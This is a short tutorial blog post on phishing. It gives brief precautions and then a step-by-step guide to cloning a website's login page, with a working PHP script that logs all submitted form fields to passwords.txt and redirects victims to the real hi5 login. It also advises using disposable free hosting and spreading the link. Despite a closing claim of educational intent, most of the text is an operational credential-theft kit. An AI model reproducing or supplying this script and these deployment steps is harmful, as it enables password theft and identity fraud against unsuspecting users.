“Phishing is a technique used to gain personal information for purposes of identity theft”.

Phishing is the most common technique utilised by the Gray hats to steal passwords and other sensitive personal data. Its is always important to know where you are filling in your passwords. The phishing pages created look exactly like the original website in design, though hideous php scripts hiding inside.  People who know nothing about php stuff tend to get fooled. Links to such pages usually circulate around the internet through social networking sites, spams, javascripts etc.

Precautions to take inorder to avoid getting hacked.

1. Whenever you are filling in your passwords or any sensitive data, always make a rule to check the address bar. Don’t step forward if you doubt the link there in the address bar.

2. Never use any javascripts provided by a unreliable source.

3. Check your browser’s homepage regularly. Make sure it hasn’t been changed by any recently installed application or a script.

Now for the real part, how to do it? (Not for beginners) queries mail to: indigoanalysis@gmail.com

Suppose you want to create a phishing page of “www123.com”. Firstly go to the website and save its source code to HDD. now make a new php script containing the following code.

<?php
header (‘Location: http://www.hi5.com/friend/login.do ‘);
$handle = fopen(“passwords.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

now name the php file to say “phisher.php”. Go to the source you saved earlier and in the form replace the action of the form to action = “phisher.php”

Make a text file named passwords.txt

Make an account in free hosting websites( use free one because your account may get deleted for phishing activities) which support php eg: www.bravenet.com or www.t35.com

Upload the html(index.html), php and the text file with your file manager. Distribute your link to the index.html (eg: account.t35.com/index.html)

With this tutorial I aim to enighten the ignorant and try to protect their identities getting leaked to wrong hands. This tutorial isn’t intended for evil purpose. (peace)
Author: Anupum pant, MSME, Ist year MANIT BHOPAL all rights reserved.